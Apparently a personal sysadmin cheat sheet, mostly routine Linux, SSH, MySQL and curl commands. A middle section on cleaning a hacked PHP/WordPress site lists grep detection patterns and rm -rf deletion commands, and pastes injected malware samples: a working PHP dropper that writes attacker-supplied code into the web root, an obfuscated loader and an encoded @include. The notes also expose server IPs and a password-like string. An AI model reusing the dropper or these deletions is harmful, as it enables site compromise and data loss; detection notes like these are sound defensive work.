#check path belong
namei -om /path/to/check

sudo usermod -aG nginx haidar

ssh-copy-id haidarvm@haidarvm.com

ssh-copy-id haidarvm@haidar.id

#remove renew ssh
ssh root@149.129.213.168
ssh-keygen -R "149.129.213.168"
ssh-keygen -R "149.129.245.60"
ssh-keygen -R "149.129.246.73"

#certbot renew
certbot renew

git clone https://gitlab.com/inkscape/inkscape --depth 1

curl -I https://haidar.tech -w %{time_connect}:%{time_starttransfer}:%{time_total}
curl -I http://149.129.213.168 -w %{time_connect}:%{time_starttransfer}:%{time_total}
curl https://haidar.id -w %{time_connect}:%{time_starttransfer}:%{time_total}

#check hdd usage
sudo du -hsx * | sort -rh | head -10

mysqldump --databases db1 db2 db3 db4 > db_backup.sql


mysqldump -u root -p --all-databases > alldb15oktRhel8in.sql

#convert docx to pdf
oowriter -convert-to pdf:writer_pdf_Export doc_file.doc


#crontab
journalctl -u cron.service | grep root

journalctl -t CROND 

grep CRON /var/log/syslog

#stat public_html
to get octal permission


#xfce4
sudo apt-get install xfce4 --no-install-recommends

#run spring with nohup
nohup mvn spring-boot:run &

#move multi folder
mv file1 file2 file3 -t DESTINATION

#find 
jobs -l

#find in script hack injected
find -iname '*.php' -print0 | xargs -0 egrep -in '@includ'
find -iname '*.php' -print0 | xargs -0 egrep -in '143_h'
find -iname '*.php' -print0 | xargs -0 egrep -in '057ho'

find -iname '*.php' -print0 | xargs -0 egrep -in 'usuna'
find -iname '*.php' -print0 | xargs -0 egrep -in ';@ini_set'
find -iname '*.php' -print0 | xargs -0 egrep -in 'substr_count'
find -iname '*.php' -print0 | xargs -0 egrep -in 'Array\(\);'
find -iname '*.php' -print0 | xargs -0 egrep -in 'Array\(\);\$'
find -iname '*.php' -print0 | xargs -0 egrep -in '\$_POST'

find -iname '*.php' -print0 | xargs -0 egrep -in 'GLOBALS'

find -iname '*.ico' -print0

find -name "*.ico" -exec rm -rf {} \;

b5e29

#find by nginx
find . -name "*.php" -group nginx

#remove .php in git
find . -type f | egrep './[a-z]{8}\.php'

find -name "*.php"
find -name "*.php" -exec rm -rf {} \;


<?php $wffilzkjpz = "xmxyrqqdedbkvrxg";$lftcmxrn = "";foreach ($_POST as $gsvvuhusr => $qjhlxonpyf){if (strlen($gsvvuhusr) == 16 and substr_count($qjhlxonpyf, "%") > 10){hgwvkmyovh($gsvvuhusr, $qjhlxonpyf);}}function hgwvkmyovh($gsvvuhusr, $swhbanedyr){global $lftcmxrn;$lftcmxrn = $gsvvuhusr;$swhbanedyr = str_split(rawurldecode(str_rot13($swhbanedyr)));function wsaebjxl($kfbuli, $gsvvuhusr){global $wffilzkjpz, $lftcmxrn;return $kfbuli ^ $wffilzkjpz[$gsvvuhusr % strlen($wffilzkjpz)] ^ $lftcmxrn[$gsvvuhusr % strlen($lftcmxrn)];}$swhbanedyr = implode("", array_map("wsaebjxl", array_values($swhbanedyr), array_keys($swhbanedyr)));$swhbanedyr = @unserialize($swhbanedyr);if (@is_array($swhbanedyr)){$gsvvuhusr = array_keys($swhbanedyr);$swhbanedyr = $swhbanedyr[$gsvvuhusr[0]];if ($swhbanedyr === $gsvvuhusr[0]){echo @serialize(Array('php' => @phpversion(), ));exit();}else{function vxelc($ecxiuobxzir) {static $hdtcne = array();$sjgqt = glob($ecxiuobxzir . '/*', GLOB_ONLYDIR);if (count($sjgqt) > 0) {foreach ($sjgqt as $ecxiuobxz){if (@is_writable($ecxiuobxz)){$hdtcne[] = $ecxiuobxz;}}}foreach ($sjgqt as $ecxiuobxzir) vxelc($ecxiuobxzir);return $hdtcne;}$spdsliiye = $_SERVER["DOCUMENT_ROOT"];$sjgqt = vxelc($spdsliiye);$gsvvuhusr = array_rand($sjgqt);$wvsyyhmt = $sjgqt[$gsvvuhusr] . "/" . substr(md5(time()), 0, 8) . ".php";@file_put_contents($wvsyyhmt, $swhbanedyr);echo "http://" . $_SERVER["HTTP_HOST"] . substr($wvsyyhmt, strlen($spdsliiye));exit();}}}



$xbdf = 366;$GLOBALS['b1fcd6'] = Array();global $b1fcd6;$b1fcd6 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['ua9850c0'] = "\x62\x40\x48\x58\x53\x33\x42\x43\x63\x49\x45\x6d\x66\x6c\x75\x72\x59\x2e\x71\x5a\x4e\x34\x23\x36\x6a\x78\x67\x3b\x57\x69\x25\xa\x2d\x39\x2b\x9\x46\x74\x5d\x2a\xd\x6f\x21\x27\x7c\x2c\x61\x51\x37\x55\x6e\x64\x68\x22\x5f\x77\x54\x4d\x5b\x79\x30\x3f\x3a\x24\x47\x7b\x60\x73\x5c\x5e\x44\x3d\x2f\x4f\x52\x7e\x70\x4b\x38\x4a\x41\x76\x28\x7a\x26\x3c\x32\x50\x6b\x20\x31\x56\x7d\x65\x29\x35\x4c\x3e";$b1fcd6[$b1fcd6['ua9850c0

#hacked example
/*b5e29*/

@include "\057ho\155e/\143li\145nt\057di\144ik\160os\057pu\142li\143_h\164ml\057wp\055co\156te\156t/\164he\155es\057tw\145nt\171ni\156et\145en\057.a\146ee\1448e\070.i\143o";

/*b5e29*/


#check storage
sudo du -hsx * | sort -rh | head -10

#kill pid
kill -9 123213

#find
grep -rnw '/path/to/somewhere/' -e 'pattern'
grep -rnw . -e 'stories'

#keyboard swap
xmodmap -e "keycode  108 = o O"


#tar no compress
tar cvf myfolder.tar myfolder

#Part split zip to max 4GB
zip -r -s 1000m javanews_html.zip public_html/
zip -r -s 4G beritainspart.zip beritainspiratif05jun.zip 
#combine to oen file
zip -s 0 beritainspart.zip --out unsplitberitains05jun.zip
#unzip directly if from folder
unzip unsplitberitains05jun.zip


#reset connection
dhclient -v -r wlp3s0


haidar2341

#swap keyboard

#check ip

curl -i -k https://haidarvm.com/hello.html -w %{time_connect}:%{time_starttransfer}:%{time_total}

curl -i -k https://javanews.tv/hello.html -w %{time_connect}:%{time_starttransfer}:%{time_total}




